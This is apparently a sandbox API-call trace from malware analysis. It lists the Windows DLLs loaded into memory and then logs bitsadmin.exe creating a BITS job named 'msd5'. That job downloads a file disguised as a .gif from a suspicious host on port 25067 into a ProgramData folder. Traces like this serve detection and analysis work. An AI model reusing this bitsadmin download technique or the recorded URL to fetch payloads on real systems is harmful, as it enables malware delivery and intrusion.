end_va = 0x745c8fff
entry_point = 0x745c0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 1302
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1303
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1304
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 1305
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1306
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1307
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1308
start_va = 0x758d0000
end_va = 0x758e8fff
entry_point = 0x758d0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 1309
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 1310
start_va = 0x75c70000
end_va = 0x768b9fff
entry_point = 0x75c70000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 1311
start_va = 0x768c0000
end_va = 0x76916fff
entry_point = 0x768c0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 1312
start_va = 0x76a20000
end_va = 0x76b7bfff
entry_point = 0x76a20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 1313
start_va = 0x76da0000
end_va = 0x76e3ffff
entry_point = 0x76da0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1314
start_va = 0x76e60000
end_va = 0x76f00fff
entry_point = 0x76e60000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1315
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 1316
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 1317
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1318
start_va = 0xc0000
end_va = 0xc6fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000c0000"
filename = ""
Region:
id = 1319
start_va = 0xd0000
end_va = 0xd1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000d0000"
filename = ""
Region:
id = 1320
start_va = 0xe0000
end_va = 0xe0fff
entry_point = 0xe0000
region_type = mapped_file
name = "bitsadmin.exe.mui"
filename = "\\Windows\\System32\\en-US\\bitsadmin.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\bitsadmin.exe.mui")
Region:
id = 1321
start_va = 0xf0000
end_va = 0xf0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 1322
start_va = 0x100000
end_va = 0x100fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000100000"
filename = ""
Region:
id = 1323
start_va = 0x520000
end_va = 0x620fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000520000"
filename = ""
Region:
id = 1324
start_va = 0x700000
end_va = 0x12fffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000700000"
filename = ""
Region:
id = 1325
start_va = 0x170000
end_va = 0x1cbfff
entry_point = 0x170000
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 1326
start_va = 0x170000
end_va = 0x1cbfff
entry_point = 0x170000
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 1327
start_va = 0x74fc0000
end_va = 0x74fcbfff
entry_point = 0x74fc0000
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 1328
start_va = 0x736a0000
end_va = 0x736dffff
entry_point = 0x736a0000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 1329
start_va = 0x170000
end_va = 0x1fffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000170000"
filename = ""
Region:
id = 1330
start_va = 0x1300000
end_va = 0x13defff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001300000"
filename = ""
Region:
id = 1331
start_va = 0x110000
end_va = 0x110fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000110000"
filename = ""
Region:
id = 1332
start_va = 0x770c0000
end_va = 0x77142fff
entry_point = 0x770c0000
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 1333
start_va = 0x758f0000
end_va = 0x7597efff
entry_point = 0x758f0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 1334
start_va = 0x120000
end_va = 0x120fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000120000"
filename = ""
Region:
id = 1335
start_va = 0x670000
end_va = 0x6affff
entry_point = 0x0
region_type = private
name = "private_0x0000000000670000"
filename = ""
Region:
id = 1336
start_va = 0x7ffdd000
end_va = 0x7ffddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdd000"
filename = ""
Region:
id = 1337
start_va = 0x1400000
end_va = 0x143ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001400000"
filename = ""
Region:
id = 1338
start_va = 0x74b40000
end_va = 0x74b55fff
entry_point = 0x74b40000
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 1339
start_va = 0x7ffdc000
end_va = 0x7ffdcfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdc000"
filename = ""
Region:
id = 1340
start_va = 0x170000
end_va = 0x1abfff
entry_point = 0x170000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1341
start_va = 0x1c0000
end_va = 0x1fffff
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 1342
start_va = 0x170000
end_va = 0x1abfff
entry_point = 0x170000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1343
start_va = 0x170000
end_va = 0x1abfff
entry_point = 0x170000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1344
start_va = 0x170000
end_va = 0x1abfff
entry_point = 0x170000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1345
start_va = 0x170000
end_va = 0x1abfff
entry_point = 0x170000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1346
start_va = 0x748e0000
end_va = 0x7491afff
entry_point = 0x748e0000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1347
start_va = 0x1440000
end_va = 0x170efff
entry_point = 0x1440000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1348
start_va = 0x75060000
end_va = 0x7506dfff
entry_point = 0x75060000
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 1349
start_va = 0x170000
end_va = 0x1affff
entry_point = 0x0
region_type = private
name = "private_0x0000000000170000"
filename = ""
Region:
id = 1350
start_va = 0x440000
end_va = 0x47ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000440000"
filename = ""
Region:
id = 1351
start_va = 0x7ffda000
end_va = 0x7ffdafff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffda000"
filename = ""
Region:
id = 1352
start_va = 0x7ffdb000
end_va = 0x7ffdbfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdb000"
filename = ""
Region:
id = 1353
start_va = 0x6f8b0000
end_va = 0x6f8b8fff
entry_point = 0x6f8b0000
region_type = mapped_file
name = "qmgrprxy.dll"
filename = "\\Windows\\System32\\qmgrprxy.dll" (normalized: "c:\\windows\\system32\\qmgrprxy.dll")
Thread:
id = 129
os_tid = 0xbdc
[0065.024] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16f85c | out: lpSystemTimeAsFileTime=0x16f85c*(dwLowDateTime=0xd76c0cd0, dwHighDateTime=0x1d469c7))
[0065.024] GetCurrentProcessId () returned 0xbd8
[0065.024] GetCurrentThreadId () returned 0xbdc
[0065.024] GetTickCount () returned 0x1e3c9
[0065.024] QueryPerformanceCounter (in: lpPerformanceCount=0x16f854 | out: lpPerformanceCount=0x16f854*=1813897000000) returned 1
[0065.025] GetModuleHandleA (lpModuleName=0x0) returned 0x4d0000
[0065.025] __set_app_type (_Type=0x1)
[0065.025] __p__fmode () returned 0x757a31f4
[0065.025] __p__commode () returned 0x757a31fc
[0065.025] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4f7f33) returned 0x0
[0065.025] __wgetmainargs (in: _Argc=0x510824, _Argv=0x51082c, _Env=0x510828, _DoWildCard=0, _StartInfo=0x510838 | out: _Argc=0x510824, _Argv=0x51082c, _Env=0x510828) returned 0
[0065.026] _onexit (_Func=0x4f925e) returned 0x4f925e
[0065.026] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0065.026] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb
[0065.026] AitLogFeatureUsageByApp () returned 0x0
[0065.027] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18
[0065.027] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b
[0065.027] VerifyVersionInfoW (in: lpVersionInformation=0x16f6d0, dwTypeMask=0x3, dwlConditionMask=0x1b | out: lpVersionInformation=0x16f6d0) returned 1
[0065.027] SetLastError (dwErrCode=0x0)
[0065.027] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75370000
[0065.027] GetProcAddress (hModule=0x75370000, lpProcName="HeapSetInformation") returned 0x753c4157
[0065.027] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0065.027] GetCurrentProcess () returned 0xffffffff
[0065.027] GetCurrentThread () returned 0xfffffffe
[0065.027] GetCurrentProcess () returned 0xffffffff
[0065.027] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x4fc3b0, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x4fc3b0*=0x80) returned 1
[0065.027] SetConsoleCtrlHandler (HandlerRoutine=0x4e74cb, Add=1) returned 1
[0065.028] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75370000
[0065.028] GetProcAddress (hModule=0x75370000, lpProcName="SetThreadUILanguage") returned 0x753c24c2
[0065.028] SetThreadUILanguage (LangId=0x0) returned 0x409
[0065.028] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437"
[0065.029] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437"
[0065.029] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437"
[0065.029] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437"
[0065.030] _wcsicmp (_String1="/transfer", _String2="/RAWRETURN") returned 2
[0065.030] _wcsicmp (_String1="/transfer", _String2="/WRAP") returned -3
[0065.030] _wcsicmp (_String1="/transfer", _String2="/NOWRAP") returned 6
[0065.030] swprintf_s (in: _Dst=0x16f7c8, _SizeInWords=0x12, _Format="%u.%u.%u" | out: _Dst="7.5.7601") returned 8
[0065.030] GetFileType (hFile=0x7) returned 0x2
[0065.030] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f73c | out: lpMode=0x16f73c) returned 1
[0065.030] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x16f76c, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16f76c*=0x2) returned 1
[0065.031] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x24, lpNumberOfCharsWritten=0x16f778, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16f778*=0x24) returned 1
[0065.031] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x16f77c, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16f77c*=0x1e) returned 1
[0065.031] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x29, lpNumberOfCharsWritten=0x16f780, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16f780*=0x29) returned 1
[0065.031] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x16f784, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16f784*=0x2) returned 1
[0065.031] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x5e, lpNumberOfCharsWritten=0x16f788, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16f788*=0x5e) returned 1
[0065.031] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x58, lpNumberOfCharsWritten=0x16f78c, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16f78c*=0x58) returned 1
[0065.032] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x16f790, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16f790*=0x2) returned 1
[0065.032] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0
[0065.043] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0065.043] GetNumberOfConsoleInputEvents (in: hConsoleInput=0x3, lpNumberOfEvents=0x16f7dc | out: lpNumberOfEvents=0x16f7dc) returned 1
[0065.043] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0065.043] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4fc3a8 | out: lpMode=0x4fc3a8) returned 1
[0065.044] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x4fc390 | out: lpConsoleScreenBufferInfo=0x4fc390) returned 1
[0065.044] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4fc38c | out: lpMode=0x4fc38c) returned 1
[0065.044] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0065.044] _wcsicmp (_String1="/transfer", _String2="/HELP") returned 12
[0065.044] _wcsicmp (_String1="/transfer", _String2="/?") returned 53
[0065.044] _wcsicmp (_String1="/transfer", _String2="/UTIL") returned -1
[0065.044] _wcsicmp (_String1="/transfer", _String2="/LIST") returned 8
[0065.044] _wcsicmp (_String1="/transfer", _String2="/MONITOR") returned 7
[0065.044] _wcsicmp (_String1="/transfer", _String2="/RESET") returned 2
[0065.044] _wcsicmp (_String1="/transfer", _String2="/TRANSFER") returned 0
[0065.044] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x1) returned 1
[0065.045] _wcsicmp (_String1="/priority", _String2="/UPLOAD") returned -5
[0065.045] _wcsicmp (_String1="/priority", _String2="/DOWNLOAD") returned 12
[0065.045] _wcsicmp (_String1="/priority", _String2="/PRIORITY") returned 0
[0065.045] _wcsicmp (_String1="foreground", _String2="FOREGROUND") returned 0
[0065.045] CoCreateInstance (in: rclsid=0x4e65d4*(Data1=0x4991d34b, Data2=0x80a1, Data3=0x4291, Data4=([0]=0x83, [1]=0xb6, [2]=0x33, [3]=0x28, [4]=0x36, [5]=0x6b, [6]=0x90, [7]=0x97)), pUnkOuter=0x0, dwClsContext=0x4, riid=0x4e65b4*(Data1=0x5ce34c0d, Data2=0xdc9, Data3=0x4c1f, Data4=([0]=0x89, [1]=0x7c, [2]=0xda, [3]=0xa1, [4]=0xb7, [5]=0x8c, [6]=0xee, [7]=0x7c)), ppv=0x4fc3b4 | out: ppv=0x4fc3b4*=0x24a554) returned 0x0
[0065.088] IBackgroundCopyManager:CreateJob (in: This=0x24a554, DisplayName="msd5", Type=0x0, pJobId=0x16f7a4, ppJob=0x16f7a0 | out: pJobId=0x16f7a4*(Data1=0x3f29ef07, Data2=0xe823, Data3=0x4ac7, Data4=([0]=0xa6, [1]=0xe7, [2]=0xf0, [3]=0x96, [4]=0x70, [5]=0x13, [6]=0xe3, [7]=0x43)), ppJob=0x16f7a0*=0x24a62c) returned 0x0
[0065.094] CoTaskMemAlloc (cb=0x50) returned 0x260cc0
[0065.094] IUnknown:AddRef (This=0x24a62c) returned 0x2
[0065.094] IUnknown:AddRef (This=0x24a62c) returned 0x3
[0065.094] PeekMessageW (in: lpMsg=0x16f71c, hWnd=0x0, wMsgFilterMin=0x400, wMsgFilterMax=0x400, wRemoveMsg=0x0 | out: lpMsg=0x16f71c) returned 0
[0065.094] IUnknown:Release (This=0x24a62c) returned 0x2
[0065.094] IBackgroundCopyJob:SetPriority (This=0x24a62c, Val=0x0) returned 0x0
[0065.098] IBackgroundCopyJob:AddFile (This=0x24a62c, RemoteUrl="http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmdwwn.gif.zip?918109560", LocalName="C:\\ProgramData\\tempa\\marxvxinhhmdwwn.gif") returned 0x0
[0065.104] IBackgroundCopyJob:SetNotifyFlags (This=0x24a62c, Val=0xb) returned 0x0
[0065.107] IBackgroundCopyJob:SetNotifyInterface (This=0x24a62c, Val=0x260cc0) returned 0x0
[0065.108] IUnknown:QueryInterface (in: This=0x260cc0, riid=0x76a63e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x16f220 | out: ppvObject=0x16f220*=0x0) returned 0x80004002
[0065.108] IUnknown:QueryInterface (in: This=0x260cc0, riid=0x76a63e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x16f1e0 | out: ppvObject=0x16f1e0*=0x0) returned 0x80004002
[0065.108] IUnknown:QueryInterface (in: This=0x260cc0, riid=0x76a597c4*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x16f1c8 | out: ppvObject=0x16f1c8*=0x0) returned 0x80004002
[0065.108] IUnknown:QueryInterface (in: This=0x260cc0, riid=0x76a69b0c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x16f17c | out: ppvObject=0x16f17c*=0x260cc0) returned 0x0
[0065.108] IUnknown:AddRef (This=0x260cc0) returned 0x3
[0065.108] IUnknown:QueryInterface (in: This=0x260cc0, riid=0x76a4c15c*(Data1=0x18, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x16f0dc | out: ppvObject=0x16f0dc*=0x0) returned 0x80004002
[0065.108] IUnknown:QueryInterface (in: This=0x260cc0, riid=0x76a4c0a8*(Data1=0x19, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x260dd4 | out: ppvObject=0x260dd4*=0x0) returned 0x80004002
[0065.108] IUnknown:QueryInterface (in: This=0x260cc0, riid=0x76a4c16c*(Data1=0x4c1e39e1, Data2=0xe3e3, Data3=0x4296, Data4=([0]=0xaa, [1]=0x86, [2]=0xec, [3]=0x93, [4]=0x8d, [5]=0x89, [6]=0x6e, [7]=0x92)), ppvObject=0x16f0e4 | out: ppvObject=0x16f0e4*=0x0) returned 0x80004002
[0065.108] IUnknown:Release (This=0x260cc0) returned 0x2
[0065.111] IUnknown:QueryInterface (in: This=0x260cc0, riid=0x251988*(Data1=0x659cdeac, Data2=0x489e, Data3=0x11d9, Data4=([0]=0xa9, [1]=0xcd, [2]=0x0, [3]=0xd, [4]=0x56, [5]=0x96, [6]=0x52, [7]=0x51)), ppvObject=0x16e5ec | out: ppvObject=0x16e5ec*=0x0) returned 0x80004002
[0065.112] IUnknown:QueryInterface (in: This=0x260cc0, riid=0x251988*(Data1=0x97ea99c7, Data2=0x186, Data3=0x4ad4, Data4=([0]=0x8d, [1]=0xf9, [2]=0xc5, [3]=0xb4, [4]=0xe0, [5]=0xed, [6]=0x6b, [7]=0x22)), ppvObject=0x16e5ec | out: ppvObject=0x16e5ec*=0x260cc0) returned 0x0
[0065.112] IUnknown:QueryInterface (in: This=0x260cc0, riid=0x251988*(Data1=0x97ea99c7, Data2=0x186, Data3=0x4ad4, Data4=([0]=0x8d, [1]=0xf9, [2]=0xc5, [3]=0xb4, [4]=0xe0, [5]=0xed, [6]=0x6b, [7]=0x22)), ppvObject=0x258310 | out: ppvObject=0x258310*=0x260cc0) returned 0x0
[0065.114] IBackgroundCopyJob:Resume (This=0x24a62c) returned 0x0
[0065.120] IUnknown:QueryInterface (in: This=0x260cc0, riid=0x76a4c17c*(Data1=0x1c733a30, Data2=0x2a1c, Data3=0x11ce, Data4=([0]=0xad, [1]=0xe5, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x44, [6]=0x77, [7]=0x3d)), ppvObject=0x16eb34 | out: ppvObject=0x16eb34*=0x0) returned 0x80004002
[0065.120] IBackgroundCopyCallback:JobModification (This=0x260cc0, pJob=0x24a6bc, dwReserved=0x0) returned 0x0
[0065.120] IBackgroundCopyJob:GetState (in: This=0x24a62c, pVal=0x260ccc | out: pVal=0x260ccc) returned 0x0
[0065.123] IBackgroundCopyJob:GetType (in: This=0x24a62c, pVal=0x16e6a0 | out: pVal=0x16e6a0) returned 0x0
[0065.137] IBackgroundCopyJob:GetProgress (in: This=0x24a62c, pVal=0x260cd0 | out: pVal=0x260cd0) returned 0x0
[0065.157] IBackgroundCopyJob:GetPriority (in: This=0x24a62c, pVal=0x16e69c | out: pVal=0x16e69c) returned 0x0
[0065.158] CoTaskMemFree (pv=0x0)
[0065.158] IBackgroundCopyJob:GetDisplayName (in: This=0x24a62c, pVal=0x16e6b4 | out: pVal=0x16e6b4*="msd5") returned 0x0
[0065.159] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16e65c | out: lpConsoleScreenBufferInfo=0x16e65c) returned 1
[0065.159] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x16e674 | out: lpNumberOfCharsWritten=0x16e674) returned 1
[0065.159] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x16e674 | out: lpNumberOfAttrsWritten=0x16e674) returned 1
[0065.159] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0065.160] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0065.160] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16e648 | out: lpConsoleScreenBufferInfo=0x16e648) returned 1
[0065.160] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x16e660, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16e660*=0xa) returned 1
[0065.160] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0065.160] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16e644 | out: lpConsoleScreenBufferInfo=0x16e644) returned 1
[0065.160] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x16e65c, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16e65c*=0x5) returned 1
[0065.161] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0065.161] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16e64c | out: lpConsoleScreenBufferInfo=0x16e64c) returned 1
[0065.161] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x16e664, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16e664*=0x7) returned 1
[0065.161] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0065.161] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16e640 | out: lpConsoleScreenBufferInfo=0x16e640) returned 1
[0065.162] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x16e658, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16e658*=0x8) returned 1
[0065.162] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0065.162] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16e648 | out: lpConsoleScreenBufferInfo=0x16e648) returned 1
[0065.162] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5043c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x16e660, lpReserved=0x0 | out: lpBuffer=0x5043c4*, lpNumberOfCharsWritten=0x16e660*=0x8) returned 1
[0065.162] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0065.162] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16e63c | out: lpConsoleScreenBufferInfo=0x16e63c) returned 1
